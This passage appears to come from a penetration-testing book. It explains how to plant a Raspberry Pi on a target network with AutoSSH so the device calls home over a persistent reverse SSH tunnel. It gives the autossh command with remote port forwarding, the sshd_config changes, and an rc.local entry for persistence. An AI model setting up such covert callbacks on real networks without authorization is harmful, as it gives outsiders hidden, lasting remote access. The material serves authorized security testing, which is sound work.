Using AutoSSH for reverse shell

For a persistent reverse SSH connection, you can use AutoSSH to set up an SSH session via a wired connection on the target network, or if you've taken the time to set up a 3G connection with USB, it can run completely wireless. AutoSSH is a package that enables you to create persistent outbound SSH connections from the Raspberry Pi to a server that you control sitting somewhere on the Internet. When the Raspberry Pi boots and has a network connection, either wired or 3G, it will automatically call home and establish a secure session to the device.

Follow this example to install and configure AutoSSH on your Kali instance. This can be used to access and carry out your attacks from a remote location.

  • To begin, install AutoSSH on your Raspberry Pi. This can, and should, be done before using it for your penetration test. Use the apt-get command to install the latest version of autossh from the repository:
    #apt-get install autossh
    Using AutoSSH for reverse shell

To set up AutoSSH, we'll need to make configuration changes on both sides: the Raspberry Pi and the server side where you will be controlling the remote device from.

  1. To begin, we'll need to grab our SSH keys, which will be used from the server side for authentication. If you've followed these steps so far, you'll remember that we regenerated new SSH keys after we "imaged" the box. These keys are located at /etc/ssh/ssh_host_rsa_key.pub. Cat this file and grab the output starting with ssh-rsa through user@host.
  2. Copy it to Notepad so it can be pasted back into your remote server to authenticate the SSH session.
    Using AutoSSH for reverse shell
  3. Now, connect to the server in the cloud where you will be controlling the Raspberry Pi from. The example host is called lambda. On this host, you'll want to add this public key to the end of your authorized_hosts file in the ~/.ssh/ directory. To accomplish this, switch to this directory and then add the key using the echo command.

    Note

    Make sure that you use two greater than symbols to append to the end of the file and avoid overwriting the file completely.

    Using AutoSSH for reverse shell
  4. To enable the reverse shell, we will need to make some changes to the SSHD configuration file. Here's a summary of what changes we will be making to the SSH daemon:

    AllowTCPForwarding (yes)

    TCP forwarding on the SSH daemon to facilitate the connection of the remote shell to a local port.

    GatewayPorts (yes)

    When you use TCP forwarding, the default behavior is to only listen on the loopback address (127.0.0.1). This option enables you to directly connect to this reverse shell from off-box, say, your laptop.

  5. Change the directories to /etc/ssh and locate your sshd_config file.

We will be using a similar technique to add the configuration changes into this file with the echo command.

  1. After the two lines are added to the sshd_config file, you will need to restart the SSHD service:
    #cd /etc/ssh
#echo "AllowTCPForwarding yes" >> sshd_config
#echo "GatewayPorts yes" >> sshd_config
#service ssh restart

    You should get the following result:

    Using AutoSSH for reverse shell
  2. Returning to the Raspberry Pi, execute the autossh command, which will build the outbound tunnel and bind it to your server in the cloud:
    #autossh –M 10000 –N –f –R 1337:localhost:22 [email protected]
    Using AutoSSH for reverse shell

    In this example, -M is the local port that autossh will run on, -N tells it not to execute a remote command (from SSH), -f (from SSH) tells it to run in the background, and -R is the remote port and will bind it to localhost on port 22, the default SSH port. The last parameter tells it to connect to our remote host using the root account.

    This information should be changed to reflect the IP or hostname where your server is running.

    -M

    The local port

    -N

    This means that you should not execute a command

    -f

    Runs in the background

    1337:localhost:22

    Port forwarding from 1337 port to port 22 on localhost, the default SSH port

    user@host

    The defined user and IP address or hostname of the remote server

  3. Now, on your server in the cloud, SSH to the local port you created using the –p flag—1337 for this example—and connect to the reverse shell sent by the Raspberry Pi. This shell is more interactive than what we had with the netcat shell since it's a full SSH tunnel. This is probably advantageous if you do this frequently with the Raspberry Pi during penetration tests.
  4. Finally, add this to the /etc/rc.local file so that every time the server boots, the session will be established. To complete this task, you will need a text editor, such as vi or nano. The rc.local file contains a line at the end of the file which must remain the last item. This prevents us from just appending to the end of the file, as shown in previous examples:
    #vi /etc/rc.local
    Using AutoSSH for reverse shell
  5. Scroll down to the line before exit 0. Use i to insert a line. Copy and paste the autossh command you generated previously. Press Esc to exit the insert mode, and finally, enter :wq to write the file and quit.

If you need some additional persistence of the tunnel, there are some additional flags you can set, such as ServerAliveInterval and ServerAliveCountMax, which will send traffic over your SSH tunnel to help ensure that it isn't cut down by a firewall between the Raspberry Pi and the remote server.

Using AutoSSH for reverse shell

Since we enabled GatewayPorts earlier in the SSHD configuration file, you can also connect to this shell directly, SSHing to the IP address of your server followed by the port you specified. In this case, this would look like the following command:

#ssh root@lambda –p 1337
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.220.174.191